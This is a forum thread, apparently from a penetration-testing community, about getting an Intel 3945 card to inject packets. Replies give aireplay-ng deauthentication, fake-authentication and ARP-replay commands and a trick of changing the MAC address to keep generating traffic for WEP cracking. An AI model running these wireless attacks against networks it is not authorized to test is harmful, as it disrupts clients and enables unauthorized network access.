Results 1 to 8 of 8

Thread: [aireplay-ng -3] deauth/dissac packet?. Is the MAC associated?

  1. #1
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    4

    Default [aireplay-ng -3] deauth/dissac packet?. Is the MAC associated?

    I'm using a IPW3945 on a sony SZ. I guess this is where my problems start!?

    But i've loaded the IPWRAW driver and got wifi0 and rtap0 loaded.

    I understand wifi0 is for injection and rtap0 is for monitoring?
    Is this right? I've seen it written both ways in the forum!

    Anyway, i've an AP MAC and a client MAC, i know it's associated. When using the dissoc attack in aireplay-ng i get:
    Code:
    Notice: got a deauth packet. Is the MAC associated?
    I know it is! I can see the beacons pause momentarily in airodump. But it doesn't provoke any IV's. Any ideas? Does it mean my card is not injecting?

    Also, using the fakeauth attack in aireplay-ng i get:
    Code:
    Sending Authentication Request
    Authentication Successful
    repeated many times. But no increase in IV's.


    Is this my card not injecting?
    (The wireless router is in the same room, it shouldn't be issues with range/reception)

    Cheers for any help!

  2. #2
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    you're not associated

    it says auth succesuful not association successful

    ....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  3. #3

    Default

    I have a 3945 and bought a WG511T for $20 'cause injecting with the 3945 flat out sucks. Sorry I couldn't help you out further and I suggest you just get a WG511T

  4. #4
    Junior Member thegreo's Avatar
    Join Date
    Jan 2008
    Posts
    61

    Default what commands?

    if you could list your exact commands it would help, we need to know exactly what you have written, we need to examine your commands.

    you mentioned, "does this mean my card is not injecting?" have you seen the thread "simple check for proper injection"?
    i cant post threads yet but search for proper injection!

    you need to break everything down.

  5. #5
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    4

    Default Exact commands...

    Cheers for the reply guys.

    No, hadn't seen the simple injection check thread, thanks. Tried it and looks like maybe injection IS the issue.
    Also... WG511T is now in the post

    But incase i've been stupid somewhere this is what i've been doing with the intel card...

    # copy IPWRAW module to desktop from USB stick
    # click module to run
    # 2 .sh files apear on desktop
    # open terminal
    cd ./tmp
    mv ipwraw-ng.lzm.bz2 ipwraw-ng.lzm
    lzm2dir ipwraw-ng.lzm /
    cd ipwraw
    make
    make install
    modprobe -r ipw3945
    load
    iwconfig
    # this displays loaded wifi0 and rtap0. Looks successful to me.
    # uses wireshark-wifi to gather AP mac address and confirm mac of a connected client
    # packets originating from the AP destined for the client are visible


    ## Firstly Deauth Attack ##
    # new terminal for airodump
    airodump-ng --bssid MAC -w dump rtap0
    #new terminal for replay
    aireplay-ng -3 0 -b MAC -c MAC -x 500 wifi0
    # Output:
    # "Network unavailable" or similar
    ifconfig wifi0 up
    aireplay-ng -3 0 -b MAC -c MAC -x 500 wifi0
    # "Read X packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)"
    #new terminal for deauth
    aireplay-ng -0 1 -b MAC -c MAC wifi0
    # should this be wifi0 or rtap0?
    # aireplay deauth sends deauth packet
    # airodump beacon count (which has been steadily rising) pauses momentarily confirming packet sent? Deauth of the connected client?
    # however the aireplay replay instance outputs:
    # "Notice: got a deauth/dissoc packet. Is the MAC associated?"
    # Well, yes! Isn't it?


    ## Secondly FakeAuth Attack ##
    # end and close instances of aireplay from previous attack
    # new terminal
    aireplay-ng -1 100 -e NAME -b MAC -h MAC wifi0
    # Output...
    # "Sending Authentication Request"
    # "Authentication Successful"
    # These two lines repeated several times until..
    # "Attack has failed. Possible reasons..."
    # I guess i can't associate... anybody know why?

  6. #6
    Junior Member thegreo's Avatar
    Join Date
    Jan 2008
    Posts
    61

    Default

    Quote Originally Posted by w_switch View Post
    Cheers for the reply guys.

    No, hadn't seen the simple injection check thread, thanks. Tried it and looks like maybe injection IS the issue.
    Also... WG511T is now in the post

    But incase i've been stupid somewhere this is what i've been doing with the intel card...

    # copy IPWRAW module to desktop from USB stick
    # click module to run
    # 2 .sh files apear on desktop
    # open terminal
    cd ./tmp
    mv ipwraw-ng.lzm.bz2 ipwraw-ng.lzm
    lzm2dir ipwraw-ng.lzm /
    cd ipwraw
    make
    make install
    modprobe -r ipw3945
    load
    iwconfig
    # this displays loaded wifi0 and rtap0. Looks successful to me.
    # uses wireshark-wifi to gather AP mac address and confirm mac of a connected client
    # packets originating from the AP destined for the client are visible


    ## Firstly Deauth Attack ##
    # new terminal for airodump
    airodump-ng --bssid MAC -w dump rtap0
    #new terminal for replay
    aireplay-ng -3 0 -b MAC -c MAC -x 500 wifi0
    # Output:
    # "Network unavailable" or similar
    ifconfig wifi0 up
    aireplay-ng -3 0 -b MAC -c MAC -x 500 wifi0
    # "Read X packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)"
    #new terminal for deauth
    aireplay-ng -0 1 -b MAC -c MAC wifi0
    # should this be wifi0 or rtap0?
    # aireplay deauth sends deauth packet
    # airodump beacon count (which has been steadily rising) pauses momentarily confirming packet sent? Deauth of the connected client?
    # however the aireplay replay instance outputs:
    # "Notice: got a deauth/dissoc packet. Is the MAC associated?"
    # Well, yes! Isn't it?


    ## Secondly FakeAuth Attack ##
    # end and close instances of aireplay from previous attack
    # new terminal
    aireplay-ng -1 100 -e NAME -b MAC -h MAC wifi0
    # Output...
    # "Sending Authentication Request"
    # "Authentication Successful"
    # These two lines repeated several times until..
    # "Attack has failed. Possible reasons..."
    # I guess i can't associate... anybody know why?
    Ok try the follwoing and post results please

    Put your device into monitor mode

    Then Start airodump
    airodump-ng -c channel number --bssid apmac -w output device (wifi0 etc)

    Then try association with AP with
    aireplay-ng -1 0 -a Ap Mac -h Device mac address DEVICE

    or
    (you may need to add the ESSID of the AP if so use the following command)

    aireplay-ng -1 0 -e NETGEAR -a Ap Mac -h Device mac address DEVICE

    you should then get:

    Sending authentication request...
    Authentication successful
    then eventually
    Association successful :-)
    ------------------------------------------------
    It is vital you get the association successful with the cheeky smile :-)
    not just authentication successful!

    Check your airodump screen you should see you Device MAC address listed there.

    If so go ahead with the injection

    aireplay-ng -3 -b AP MAC -h Device MAC Device

    Please post results, hope this is clear and if you can follow these steps and confirm each step works or where it may go wrong. Thanks

  7. #7
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    8

    Default

    This is quite an old topic but ;D
    You cannot associate, cause AP is sending you deauth packets, thus you have to associate at the beggining and then start airodump-ng, aireplay-ng -3 and try to deauth other clients. AP will start sending you deauth packets anyway, but I usually have at least one ARP at this point. You cannot associate again, so you have to change your MAC and associate with that changed MAC and then use aireplay-ng -3 with -r option (allows you to replay ARP packet stored within .cap file from previous session). That's the way I do it and it's working ;d (I have Intel 3945 btw)

  8. #8

    Default

    Quote Originally Posted by sanshinron View Post
    This is quite an old topic but ;D
    You cannot associate, cause AP is sending you deauth packets, thus you have to associate at the beggining and then start airodump-ng, aireplay-ng -3 and try to deauth other clients. AP will start sending you deauth packets anyway, but I usually have at least one ARP at this point. You cannot associate again, so you have to change your MAC and associate with that changed MAC and then use aireplay-ng -3 with -r option (allows you to replay ARP packet stored within .cap file from previous session). That's the way I do it and it's working ;d (I have Intel 3945 btw)
    Yes, this is an old topic indeed, I think that this should have been used before starting yet what will probably soon be another long thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •